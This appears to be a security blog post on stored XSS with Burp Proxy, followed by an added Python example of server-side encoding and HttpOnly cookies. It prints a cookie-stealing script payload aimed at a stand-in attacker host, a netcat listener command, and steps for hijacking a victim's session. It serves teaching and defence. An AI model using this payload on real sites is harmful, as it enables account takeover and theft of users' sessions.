a collection of stuff, thangs.....

Stored XSS using BURP proxy

Posted: 2015-05-23 16:47:04 (ohai)

In this video we exploit input validation that is enforced only on the client side to steal another user's cookie. This is a fairly standard and straightforward action. The first time I saw this in action was during a SANS course, I honestly forget which one. It doesn't really come up very often in online CTFs but might be handy to have in your back pocket.

Once we have identified our opportunity to bypass their filter (@37 seconds), we fire up BURP (proxy mode) and post the actual data we want stored on the server, skipping the browser-side check entirely. In this case, a JavaScript image request that sends the user's cookie to a netcat listener on our evil box.

<script>new Image().src="http://EVIL.IP.AD.DY/gotcha.php?cookie="+document.cookie;</script>

After we've got our evil JavaScript stored on the server, along comes the victim (Chromium browser), who views the page containing our evil JavaScript and shoots his cookies to our netcat listener.

nc -lnvp 80

Once we've got his cookies, we just edit our own, pasting in the victim's cookie info, and bam, we went from being 'hacker10' to 'hacker20'.
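For the defensive side of the same flow, here is an added example (not code from the original post or the video) that models why the proxy trick works and what actually stops it: a client-side filter that never runs when the request is sent through a proxy, a server that stores whatever it receives, and the two fixes that hold up regardless of the client, HTML-encoding stored content at output time and issuing the session cookie with HttpOnly so document.cookie cannot read it. The function names, the in-memory "database" and the cookie value are constructed for illustration; the payload used as test input is the one quoted above.

```python
"""
Added example (not from the original post): a minimal model of the
comment-storage flow described above, showing why client-side validation
alone cannot stop a stored XSS and what neutralises it server-side.
Names and sample data are constructed for illustration.
"""
import html
import re

# The payload from the post, used here only as input to the defensive code.
SAMPLE_PAYLOAD = ('<script>new Image().src="http://EVIL.IP.AD.DY/gotcha.php?cookie="'
                  '+document.cookie;</script>')


def client_side_filter(text: str) -> str:
    """Models a browser-side filter that strips <script> blocks before submit.
    It never executes when the request is replayed from a proxy, so the
    server cannot assume it ran."""
    return re.sub(r"(?is)<script.*?</script>", "", text)


def store_comment(db: list, body: str) -> None:
    """Server-side storage that trusts the client filter (the weak setting)."""
    db.append(body)


def render_unsafe(db: list) -> str:
    """Vulnerable rendering: stored comments are placed in the page verbatim."""
    return "".join(f"<p>{c}</p>" for c in db)


def render_safe(db: list) -> str:
    """Hardened rendering: every stored comment is HTML-encoded at output time,
    independent of whatever validation did or did not happen on the client."""
    return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in db)


def contains_active_script(rendered_html: str) -> bool:
    """Rough check: does the rendered page still carry a live <script> element?"""
    return re.search(r"(?i)<script\b", rendered_html) is not None


def session_cookie_header(session_id: str) -> str:
    """Issue the session cookie with HttpOnly so script cannot read it; even if
    an injected script does execute, the cookie is not available to exfiltrate."""
    return f"sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def readable_by_document_cookie(set_cookie: str) -> bool:
    """Models the browser rule: HttpOnly cookies are invisible to document.cookie."""
    attrs = {a.strip().lower() for a in set_cookie.split(";")[1:]}
    return "httponly" not in attrs


def demo() -> dict:
    db = []
    # Submitted through the real browser form: the client filter strips the script.
    store_comment(db, client_side_filter(SAMPLE_PAYLOAD))
    # Submitted through the proxy (the @37s bypass): the filter never ran.
    store_comment(db, SAMPLE_PAYLOAD)
    return {
        "unsafe_has_script": contains_active_script(render_unsafe(db)),
        "safe_has_script": contains_active_script(render_safe(db)),
        "cookie_readable": readable_by_document_cookie(session_cookie_header("abc123")),
    }


if __name__ == "__main__":
    print(demo())
```

The point the model makes is that the browser-side filter and the server-side encoding are not interchangeable: the first is advisory and disappears the moment a proxy is in the loop, the second is enforced where the data is actually rendered. HttpOnly is the second, independent layer; it does not stop the script from running, but it removes document.cookie as the thing worth stealing.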

Post Tagged with:
Stored XSS, Burp Proxy
